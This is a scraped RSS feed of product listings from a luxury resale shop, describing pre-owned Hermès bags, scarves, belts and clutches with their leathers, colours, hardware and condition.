Hermès Bag https://www.cblbags.com/en/p/hermes-birkin-35-fjord-blue-jean/ Fri, 19 May 2017 11:36:46 +0000 https://www.cblbags.com/?post_type=product&p=13137/ The Blue Jean color is truly amazing and can easily be coordinated with any outfit. This bag features palladium hardware, white stitching and includes all of the original accessories. Terrific!

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This bag is itself an statement in the fashion industry. This Birkin 35 is made of fjord, a very durable, light and gently stretch marked leather that holds shape very well and does not show scuffing and scratching easily. The result is a very soft-touch and supple bag. Also, this Birkin has a nice contrast between its main blue jean color and its white stitch. Accentuated with palladium hardware, this Birkin is a stunning bag that you won’t want to miss out on.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/kelly-32-retourne-fjord-blue-jean/ Thu, 18 May 2017 08:52:56 +0000 https://www.cblbags.com/?post_type=product&p=13056/ This Kelly 32 is a modern classic. Its medium size and strap make of this bag a daily match. Besides, the Blue Jean color and ruthenium hardware really make this bag special.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This Kelly 32 is a handbag made of soft and distinguished Fjord leather in Retourne style. Its medium-size grain offers a nice texture in blue jean color, which combines in contrast with the black edges and white stitching. Besides, it has ruthenium metallic accents, a little bit darker material than silver palladium, less common among these models. The bag is lined in black goatskin and includes a zipped pocket and a double patch pocket. Apart from these particular features, this handbag shows the unmistakable characteristics from the Kelly model: the straight flap with the sangles and turning closure, its triangular shape and the top handle.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Accessory https://www.cblbags.com/en/p/12478/ Tue, 11 Apr 2017 11:18:55 +0000 https://www.cblbags.com/?post_type=product&p=12478/ More than 46 colors were used in the creation process of this special carré. Lead by the illustrator of the French house, Antoine Tzapoff, this design is one of the most amazing Hermès' recent pieces.

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
This Hermès silk scarf features a background full of details and contrasted with the beautiful portrait of the Native American Princess, ‘Wa’Ko-Ni’.  Details are done in numerous colors where we can find shades of vibrant acid yellow, green and reddish tones. Indeed, this carré is one of the most amazing pieces of Hermès from the past seasons.

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
Hermès Accessory https://www.cblbags.com/en/p/hermes-accessory-hermes-accessory-clic-clac-h-bracelet-palladium-black/ Fri, 07 Apr 2017 10:13:37 +0000 https://www.cblbags.com/?post_type=product&p=12479/ A classic yet very modern accessory. A bracelet with a beautiful palladium-black combination and the renowned H clasp.

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
Iconic Bracelet from Hermès house. The Clic-Clac H takes its name from the H-shaped clasp. It has a thin band of palladium silver with a hinge on one side and opens with a swivel “H” on the other side. A band of black enamelwork covers the major part of the bracelet.

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/12412/ Wed, 05 Apr 2017 16:08:21 +0000 https://www.cblbags.com/?post_type=product&p=12412/ Made of silk and Barenia leather, this Hermès bag is a special item full of the French firm flair. The intense orange color and its beautiful illustration, make it terrific. Indeed a collector's piece.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This beautiful Hermès bag is a perfect alternative for those looking for an ultralight bag, This “Silky Hèrmes Silky City Terre Kelly en Perles” is a gorgeous alternative to leather bags. Just as the name suggests, the bag is made of silky fabric and details made of Barenia leather, as trim and handle. Also, the bag features the lovely “Kelly en Perles” print. This bag is a great everyday bag and will hold all of your daily essentials in style. Orange, brown and ecru are the colors of this super light Hermès Silky City bag that includes a detachable pochette and ajustable leather strap.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-26/ Tue, 04 Apr 2017 16:14:26 +0000 https://www.cblbags.com/?post_type=product&p=12379/ Hermès has transfixed the world with its supreme craftsmanship and elegant designs. This vintage Kelly 28 is a great example as it shines thanks to its great combination of colors and textures.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The famous Hermès Kelly is still being a reference in the fashion industry. This vintage one, in the “retourne” style, has a nice contrast between its burgundy boxcalf leather and the iconic ecru canvas. It keeps the clochette with lock and two keys and a single rolled handle. The interior is lined with chevre and looks impecable. Indeed, a treasure bag!

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-32-crocodile-porosus-skin-whisky/ Mon, 13 Mar 2017 11:15:22 +0000 https://www.cblbags.com/?post_type=product&p=11916/ A shiny hazel-tone color joins this Kelly 32 in Crocodile leather to dazzle its audience. A wonderful handbag from 2003 including all its accessories. Collectors piece.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Beautiful Hermès Kelly Bag 32 Porosus Crocodile leather in whisky color with gold hardware. This item features the iconic “Kelly style” clasp with two tabs and a straight, single-piece flap. The bag has a top handle and includes clochette, tirette, covered lock and keys. It also comes removable leather strap in the same color of the bag. Goat lining has three pockets: two open and one with zip closing.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-35-fjord-leather-curry/ Tue, 24 Jan 2017 09:44:50 +0000 https://www.cblbags.com/?post_type=product&p=11232/ Superb Birkin 35 in this unique Curry tonality combined with durable and delicate Fjord leather. Includes large and small dustbag. A gift to your senses.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This wonderful Birkin in 35 size is crafted of a delicate combination of Fjord leather and Curry color, whose large grain and stretch marked skin highlight this special yellow-earthly tonality and give the bag both a durable and soft shape. Its gold tone hardware strike the perfect match with these features. Apart from that, the bag has all the Birkin distinctive features: three-partition flap, double top handle, the “sangles” closure and its reinforced bottom with protective metallic feet.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Travel Bag https://www.cblbags.com/en/p/hermes-travel-bag-hermes-victoria-ii-buffle-leather-crinoline-rouge/ Fri, 13 Jan 2017 10:24:05 +0000 https://www.cblbags.com/?post_type=product&p=11203/ The Crinoline hair and Buffle leather strike the perfect combination in this Rouge H color. A durable and large capacity travel bag. A lovely one.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Victoria II model in a large 50 size to use as a travel bag. It is made of a superb combination of Buffle leather with an astonishing burgundy tonality, the Rouge H (like the red wine) and multicolor, based Rouge as well, crinoline horse hair. This model presents double handle that allows you to carry it on shoulder or by hand and zipper closing with a device to fix the zipper with the padlock. Featuring golden hardware and embossed II on one of the handles. The bag has plenty of room to store all your daily essentials and lining is covered with clear beige fabric.

 

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-pillow-vibrato-green-leather-messenger/ Thu, 12 Jan 2017 17:30:04 +0000 https://www.cblbags.com/?post_type=product&p=11180/ This wonderful and extremely rare piece combines the signature Hermès Vibrato leather in green tonality and super soft leather. Besides, the strap makes it so comfy. A must.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Made of soft green lambskin leather on the inside and striped Vibrato leather on the outside, based also in green tonalities. Its open top with two flaps on each side can be folded up and down. It features a detachable leather strap, to wear the bag cross body. Accents in wonderful palladium metal.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Travel Bag https://www.cblbags.com/en/p/hermes-travel-bag-bolide-45-togo-leather-orange/ Wed, 11 Jan 2017 16:49:45 +0000 https://www.cblbags.com/?post_type=product&p=11154/ This large size from the Bolide will become your best travel companion. Very roomy and incredibly stylish, it is a different bag from Hermès you're going to fall in love with.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
This model is the renowned Bolide, with its curved upper corners and double top handle. It is crafted of the iconic Togo leather in Hermès Orange signature color. Top zipper and hardware in palladium metal. With a reinforced base with protective studs to place wherever you wish without risking to damage it. Its lining is made of beige fabric and orange leather.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-32-sellier-epsom-gold/ Thu, 05 Jan 2017 10:36:55 +0000 https://www.cblbags.com/?post_type=product&p=11023/ An iconic handbag, rigid and everlasting. This piece of art will walk by your side thanks to its comfy strap band and its medium size.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Kelly 32 is crafted of durable Epsom leather in Gold color, Hermès’ iconic tonality. The straight flap with closure tabs, the top handle, its triangular shape, reinforced base with metallic protection studs…, every feature that makes the Kelly what it is can be found in this wonderful medium size model. Its flap opens up to a goatskin lining with three pockets, a zipper one and two slide pockets. The gold tone hardware elegantly matches with the Gold color, creating one of the most desired combinations.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/bolso-hermes-kelly-28-sellier-croco-vintage-black/ Wed, 04 Jan 2017 09:16:50 +0000 https://www.cblbags.com/?post_type=product&p=10937/ Very well preserved Kelly 28 from 1964 in Crocodile Porosus leather. Black color and gold hardware for this vintage jewel handbag from Hermès.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Outstanding piece from 1964. A Kelly 28, the most desired size, crafted of wonderful black exotic leather. Every feature that makes the Kelly the icon it is nowadays can already be found in this awesome vintage handbag. Its straight flap with closure tabs, the single top handle, triangular shape and reinforced base with metallic feet. The flap opens up to an interior lined with goatskin featuring a zipped pocket and two more slide pockets. The gold tone hardware matching the black exotic leather creates a classic timeless contrast.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-25/ Fri, 30 Dec 2016 15:32:09 +0000 https://www.cblbags.com/?post_type=product&p=10779/ Elegant and sophisticated, its golden hardware and the Noisette color reminds of the chic flair of a "Café Parisien". Terrific!

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Noisette, is a variety of brown color that mixes hazel shades with the elegant and fine pallor of its leather. The Ardennes leather has a flat grain which helps the bag to keep it stiffness and its silhouette, also reinforced because its “sellier” manufacturing. In essence this is a vintage bag in a mint condition and always comfortable because of its shoulder strap.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-24/ Fri, 23 Dec 2016 12:56:58 +0000 https://www.cblbags.com/?post_type=product&p=10703/ The Retourne manufacturing makes the Kelly a great travel bag because of its pliability. This style is perfect for everyday wear, offering a softer look and a more casual look. In a beautiful brown Sienna color, this Kelly 20 Epsom is astonishing.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This exquisite Hermès Kelly 28 does attract the spotlight because its perfect silhouette and beautiful leather. In a cute size and made of Epsom leather it features an intense Sienne brown color that mix brown shades and reddish hues with the golden color of its hardware. As a result this bag is full of brightness thanks to the properties of this luxury leather keeping at the same time its beautiful shape.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-40-retourne-fjord-black/ Mon, 19 Dec 2016 10:23:55 +0000 https://www.cblbags.com/en/?post_type=product&p=10452 Magnificent Kelly in durable and flexible leather with removable strap. Very roomy. Wear it as a day bag or as a travel accessory, either way it will become your best friend.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The classic model from Hermès in its biggest size, 40 cm, and black leather Fjord is a Kelly that can both be used as an executive day bag and a confortable accessory to travel or carry heavier items. Its leather features characteristic deep lines wriggling alongside the handbag. Besides, it is a very durable and water resistant material. This Kelly offers a velvety touch with matt finish and a flexible structure with lots of space. The nice palladium hardware shown in its classic closure tabs and hardware matches ideally with color and skin.

 

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-35-chamonix-black/ Wed, 07 Dec 2016 11:19:27 +0000 https://www.cblbags.com/en/?post_type=product&p=10246 Vintage-inspired and complete with all its accessories, this Birkin 35 in black Chamonix leather and gold hardware is an authentic piece of art. Delightfully crafted and finished.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Its black color and extra smooth leather make of this Birkin in 35 size just a perfect bag. Chamonix leather provides lightness and a delicate matte finish to this model. The bag has a velvety look because of the tiny size of the grain, resulting in a consistent shape that keeps its straightness. Black leather combined with gold tone hardware gives a vintage touch to this Birkin. An irresistible piece of art. This Birkin wears all its characteristic features such as the short double handle, the three-part flap, the tabs and its protective bottom studs.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-23/ Thu, 01 Dec 2016 15:50:44 +0000 https://www.cblbags.com/en/?post_type=product&p=10189 Sleek and ultra smooth. Art and craftsmanship are at the centre of this Kelly 32 Retourne. The famous style will look on point wherever you go 24/7.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Every inch of the Hermes Kelly bag is handcrafted in France, from the gorgeous exterior available in a variety of authentic leathers and colors. This Kelly 32 Retourne is crafted in a delicate “sable” color. This sandy tone blends perfectly with the golden color of its hardware, having as a result an amazing bag ideal to wear from desk to dinner. This style has a retourne manufacturing that gives to the bag a softness finish as well as a delicate appearance. Made of ardennes leather, this leather is indeed a sophisticated one

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-22/ Tue, 29 Nov 2016 16:46:49 +0000 https://www.cblbags.com/en/?post_type=product&p=10013 This Kelly 28 Epsom leather is the bag you are dreaming about. Nothing gives the confidence boost of a beautiful vintage Hermès bag. Speechless.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This Kelly 28 is one of the most desired bags. This size is actually feminine, unusual an indeed is not an easy job to get one. Made of a beautiful Epsom leather with a delicate stitching in the same color, called by the firm as Bleu de Presse, this bag shows a delicious silhouette thanks to its sophisticated rigid shape. Also, its combines an intense navy blue with gold hardware, this Hermès Kelly is such a tremendous bag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-40-togo-black/ Tue, 08 Nov 2016 18:30:19 +0000 https://www.cblbags.com/en/?post_type=product&p=9678 Timeless handbag in superb black grained Togo leather. A very roomy Birkin. A match for those days when you need maximum capacity while keeping smart to the top.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The it bag. The Birkin in wonderful Togo black leather. This is the large size, 40 cm, the model’s last one before it becomes its older brother and forefather, the Haut à Courroies. We can see the classic three-parts flap with both tabs and the short double handle. This concrete Birkin shows palladium hardware that matches perfectly with the black color thus giving it a very current look. Reinforced base with metallic studs for better protection. Goatskin lining with two patch pockets: an open one and a zippered close.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Bolso Hermès https://www.cblbags.com/en/p/bolso-hermes-kelly-32-sellier-togo-gold/ Fri, 04 Nov 2016 11:45:29 +0000 https://www.cblbags.com/?post_type=product&p=9547 Showing off the classic Hermès signature color and blending the elegant white stitching with a palladium hardware, the result in an superb iconic Kelly 32.

La entrada Bolso Hermès se publicó primero en CBL Bags.

]]>
This Hermés Kelly 32 bag is crafted in the unique and classy gold leather color. Even being a “sellier” style, this bag is the very opposite of the rigid one. The palladium hardware gives it a more casual look. Short handle to carry in hand and detachable leather shoulder strap to wear it across, this bag has a ductile and soft touch.

La entrada Bolso Hermès se publicó primero en CBL Bags.

]]>
Hermès Backpack https://www.cblbags.com/en/p/hermes-backpack-herbag-toile/ Thu, 20 Oct 2016 10:28:11 +0000 https://www.cblbags.com/?post_type=product&p=9409 Very special and stylish item, the Herbag is a very light backpack with two different size of canvas. An exceptional model for the Hermès collector.

La entrada Hermès Backpack se publicó primero en CBL Bags.

]]>
It’s one of the most recognizable models from Hermès. This models features a bold simplicity with the most original design. It is a backpack with a pair of exchangeable canvas in two sizes. It features classic colors from Hermès, Gold for the leather and ecru for the canvas. They strike a wonderful combination with the palladium hardware. For the Herbag model, the H toile has been treated to ease its cleaning. Timeless and classic model.

La entrada Hermès Backpack se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-28-box-calf-burgundy/ Tue, 27 Sep 2016 11:03:24 +0000 https://www.cblbags.com/?post_type=product&p=9181 The burgundy color elegance without parallel and its perfect 28 fit size make of this Kelly an Hermes' wonder.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Iconic Hermès’ Bag in size 28 and beautiful smooth Box Calf skin in stunning burgundy color. This Kelly features gold hardware and skin goat lining. Single, rigid and short handle. “Kelly style” closure with the tabs adjusting the main flap. Rigid and reinforced base that includes four metallic studs for a better protection. The interior of the bag has three pockets, two open and a big and zipper one.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-32-box-calf/ Wed, 21 Sep 2016 18:35:45 +0000 https://www.cblbags.com/?post_type=product&p=9149 The Kelly, in 32 size and crafted of the amazing Box Calf in black. An icon. As far as elegance can reach.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Iconic Hermès’ Bag in size 32 and beautiful smooth skin, the Box Calf, in black. This Kelly features gold hardware and skin goat lining. Single, rigid and short handle. “Kelly style” closure with the tabs adjusting the main flap. Rigid and reinforced base that includes four metallic studs for a better protection. The interior of the bag has three pockets, two open and a big and zipper one.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-evelyne-bag-toile-h-white-strap/ Tue, 20 Sep 2016 11:55:51 +0000 https://www.cblbags.com/?post_type=product&p=9042 An ideal choice for your casual outfits. Keep up to the daily routine with your maximum brightness.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Beautiful first generation Evelyne in leather and H canvas, total white. Sides and base are made of Sikkim leather while the canvas shapes the frontal and back part of the bag. It is thought to be worn cross body thanks to its removable strap in white regular canvas. The Evelyne features a push lock in the back part, palladium hardware and shows the punch H on the front.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-21/ Fri, 09 Sep 2016 10:54:55 +0000 https://www.cblbags.com/?post_type=product&p=8879 A classic staple made to measure for any fashionista. Made of Epsom leather, this Birkin is forever.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
This stunning Chocolate Epsom Birkin bag is the perfect touch to your look with the classic Hermès lines. This stand-out bag combines an amazing stiff leather with an intense color and palladium hardware. Thanks to the Epsom leather, this Birkin is ultra weight and perfect for those who are looking for this style in a light version. Also and as a plus, its comes with all its extras.

 

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-20/ Thu, 07 Jul 2016 09:42:33 +0000 https://www.cblbags.com/?post_type=product&p=8459 This Hermès crossbody is great to carry your essential. Made of in a smooth black lambskin, this accessory is a must.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This Hermès Toudou style is made of lambskin leather and it has an adjustable strap with two different lengths. This superb soft bag combines the plain design with details that reminds of the glove style. It closes with a press stud on a tab and its shoulder strap is flat, removable and extremely flexible.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-19/ Thu, 30 Jun 2016 08:30:41 +0000 https://www.cblbags.com/?post_type=product&p=8421 This Hermès Bolide is made of a soft and shiny leather which blends perfectly with the Blue Royale color from Hermès.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Since 1923 this bag remains in the closet of all those who have crossed with the brand at some point. The Hermès Bolide is one of the most recognizable Hermès style. This style features double top handle, shoulder strap and gold tone hardware combined with a solid base and a blue color called Royale. Its interior is also lined with the same kind of leather and includes a flat patch pocket.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-18/ Mon, 06 Jun 2016 16:04:55 +0000 https://www.cblbags.com/?post_type=product&p=8052 Beyond just color, Hermès' bags all come in a variety of sizes, leathers and hardware options. Always with exquisite taste this Kelly Vintage is the proof of it.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
It is one of the must in the most recent fashion history. The Kelly continues being the leader in terms of a timeless accessories, simplicity and because it is one of the most wanted bags. No matter the target, with which is combined or whether it is day or night, this bag designed based on straight and clean lines, makes Hermès proud of its creation. This particular style is made of “Box Calf” black leather, it performs a single handle and it has gold hardware. Dated on 1949 this bag is in a very good preloved condition.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-17/ Fri, 03 Jun 2016 16:27:12 +0000 https://www.cblbags.com/?post_type=product&p=8043 This Birkin made of Barenia leather is a marvelous piece. With a nice patina and a smooth finish, this bag is such a piece.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Barenia is one of the most exquiste leathers and tricky to find. With a smooth finish and the leather in its original color and brightness, this Birkin 40 is an exceptional piece. Barenia is a high quality calf leather and it has an impeccably smooth exterior with just the right amount of gloss to make it shine. But besides its delicate appearance exterior, this bag is also completely scratch resistant thanks to the oil absorbing material, which is as well water resistant. Also, this type of leather develop a nice patina over a series of time. As a plus, this bag has a beautiful silver plate palladium. An incredible piece.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-16/ Wed, 04 May 2016 10:52:11 +0000 https://www.cblbags.com/?post_type=product&p=7859 This stylish and classic Kelly bag is crafted of finely grained swift calfskin leather and is entirely foldable.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This style is ultra lightweight, flexible, made of Swift leather. This bag is also so perfect for your traveling needs. A sophisticated one and with an elegant twist. This Kelly 35 Flat in a great Hermès orange color is great to carry on its top handle either with is thin shoulder adjustable strap. One of the most striking features of this bag is its closure, which is called Etriviere. This closure has to be pull through the strap guides, belt it at the buckle, and then you twist the end on itself. This style keeps its shape when stands and at the same time is entirely collapsible and foldable. Matte interior.

 

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-15/ Wed, 23 Mar 2016 16:47:29 +0000 https://www.cblbags.com/?post_type=product&p=7583 A chic and stylish bag with all the flair from Hermès.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The classic three flap design but with a twist. This style called Hermès Shoulder II has the famous layout from the French firm. This bag in a special “terre” color is made of the resistant Clemence leather and it combines an elegant silver hardware with a more robust silhouette than its “relatives”. This bag is strong and has a huge personality. It perfomes a double rounded handle and is reinforced by metal studs. Its interior is roomy and has no inner pockets. It comes with tirette, clochette, lock and keys. A timeless piece.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-14/ Wed, 09 Mar 2016 18:02:38 +0000 https://www.cblbags.com/?post_type=product&p=7179 Perfect measure and in a stunning green, this Birkin 35 is a real eye-catcher.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Birkin is the king of bags and it is for Hermès one of the brand’s great creations. This particular style is crafted in a really resistant togo leather dyed in a very special green called Anise. Within the infinite color palette of the brand, this color is not acid or neon but fresh and bland. In a mint  condition, this Birkin has the perfect size and it still preserves the packaging plastics. The last touch is the brown stitching which combines wonderfully with the silver hardware and its main color. The perfect bag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Travel Bag https://www.cblbags.com/en/p/hermes-bag-13/ Tue, 01 Mar 2016 09:03:42 +0000 https://www.cblbags.com/?post_type=product&p=6930 This travel bag is the mother of the legendary Birkin. Exquisite.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Certainly, this is one of the icons of the French firm. A classic travel article with a fine touch. Made of in a exquisite blue dyed togo leather and showing a prominent stitching in white, this travel bag has a beautiful palladium hardware, double rounded handle and three flaps. In fact, this bag is the mother of the legendary Birkin. Its vertical lines make a nice contrast with the horizontality of its tripartite flap in a bag with a large capacity. Although it is not light in weight, its leather is the main claim as well as the perfection in every stitch.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-12/ Tue, 15 Dec 2015 11:31:54 +0000 https://www.cblbags.com/?post_type=product&p=6392 This Kelly 32 made of Epsom leather is a classic and delicate bag. Its Gold color makes this bag a key piece. Symmetrical and elegant, the Kelly is on trend and it will be for many years.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
We are in front of a classic and very recognizable style by Hermès. A beautiful Kelly 32 featuring a really nice Gold tone. Its is a unique and gentle bag but at the same time shows a beautiful contrast with the pale color of its seam all around its silhouette. Simple and minimal, this bag last forever.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-11/ Wed, 09 Dec 2015 19:12:16 +0000 https://www.cblbags.com/?post_type=product&p=6350 This Hermès Kelly 35 Celeste Epsom Leather is a timeless and elegant piece. Its white seam gives a more casual touch being still a perfect and unique bag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This beautiful Kelly 35 is one of the most recognizable Hermès bag. Made of Epsom leather and palladium hardware, its stunning Celeste color mixing up with the white trim creates a most casual look, being still elegant and chic. Its solid skin but pleasant and smooth, makes its silhouette perfect and defined. This Kelly is perfect to wear across all seasons.

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Briefcase https://www.cblbags.com/en/p/hermes-briefcase-sac-a-depeche-box-brown/ Mon, 17 Aug 2015 09:39:48 +0000 https://www.cblbags.com/?post_type=product&p=3274 Hermes "Sac à Dépêche". The seriousness of the straight line in this gorgeous satchel. The highest luxury standard in bag menswear.

La entrada Hermès Briefcase se publicó primero en CBL Bags.

]]>
Hermès Briefcase Sac à Dépêche model in Box Calf leather brown. It features gold hardware, flap S-lock fastener and a short and flat handle. Includes tirette, clochette and keys; lock is missing. Key is palladium instead of gold. The briefcase opens up in accordion-like shape to three compartments: two large ones and a flatter third.

La entrada Hermès Briefcase se publicó primero en CBL Bags.

]]>
Hermès Clutch https://www.cblbags.com/en/p/hermes-clutch-jige-panama/ Sun, 16 Aug 2015 20:42:02 +0000 https://www.cblbags.com/?post_type=product&p=3238 Hermès Jige in Panama and Terracota Box Calf. Quite a cool material-color combination for this peculiar model from the most iconic Hermès clutch.

La entrada Hermès Clutch se publicó primero en CBL Bags.

]]>
A superb model from the most iconic clutch chez Hermès, the Jige. This piece is made in an astonishing color-material combination: terracota Box Calf leather and ocre Panama. Besides, lining presents terracota Velvet leather, a material giving a smooth velvet finishing touch. To close the Jige a tab must be slid under the H sewed in front to attach the flap. From year 1999.

La entrada Hermès Clutch se publicó primero en CBL Bags.

]]>
Hermès Clutch https://www.cblbags.com/en/p/hermes-clutch/ Sun, 16 Aug 2015 18:58:04 +0000 https://www.cblbags.com/?post_type=product&p=3195 Hermès Jige Clutch in burgundy Box Calf. Smart and really beautiful, this vintage piece goes back to 1976.

La entrada Hermès Clutch se publicó primero en CBL Bags.

]]>
Really pretty vintage model from the most iconic clutch chez Hermès, the Jige. This piece is made in Box Calf leather burgundy color and H canvas lining. It shows burgundy backstitch in leather and white saddle stitch for the H clasp. To close the Jige a tab must be slid under the H sewed in front to attach the flap. It dates back to year 1976.

La entrada Hermès Clutch se publicó primero en CBL Bags.

]]>
Hermès Belt https://www.cblbags.com/en/p/hermes-belt/ Thu, 13 Aug 2015 16:05:32 +0000 https://www.cblbags.com/?post_type=product&p=3122 Hermès Medor Belt in blue "Abysse" lizard skin. A gorgeous, flashy vintage piece from 1988.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
 

Amazing belt Medor “Collier de Chien” made in blue “Abysse” lizard skin and Box Calf Gold on the inside part. It features gold hardwares and blue backstitch. Buckle has a series of slots where a piece of metal is inserted to be locked with a metal loop afterwards. This showy belt has metal ornamentals like a ring and tacks, as typical in accessories from “Collier de Chien” line.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-sac-mangeoire/ Wed, 12 Aug 2015 14:41:28 +0000 https://www.cblbags.com/?post_type=product&p=3036 Hermès Sac "Mangeoire" in Gold Box Calf. A piece from the 60s inspired by old horses troughs.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Sac “Mangeoire” in Gold Box Calf leather thought as a classic tupperware and inspired by old horses’ troughs. Therefore its particular cylinder shape. It features gold hardware, adjustable handle, four holes in the upper part and leather trim at base and body. This piece dates back to the 60s and it is in fair condition regarding its antiquity.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bucket-bag-courchevel-gold/ Wed, 12 Aug 2015 10:51:51 +0000 https://www.cblbags.com/?post_type=product&p=3008 Hermès Bucket Bag. A cute model to use for a picnic, a stroll in nature or a casual day.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Hermès Bucket Bag is made in Courchevel Gold leather and features gold hardware. It has an adjustable strap to carry it on your shoulder and several holes in different sizes. The top part has a drawstring to adjust the leather that functions as a tap. This item includes dustbag and would work perfectly as tupperware or casual country bag. The silk scarf is merely ornamental inspiration and does not come with the bag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-farming-basket-epsom-blanca/ Wed, 12 Aug 2015 09:11:01 +0000 https://www.cblbags.com/?post_type=product&p=2964 Hermès Farming Basket Bag in Epsom Gold. What better for your picnics or casual need-to-be chic moments.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
A charming model from Hermès, the Farming Basket Bag in white/gold Epsom leather. It features a thin strap to carry it on shoulder; the tap slides along this strap to be removed but never separated from the bag. The Farming has a bucket shape, which makes it perfect tu use it as a tupperware for picnics. The bag shows palladium hardware and the base is rigid. Includes dustbag and original box.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
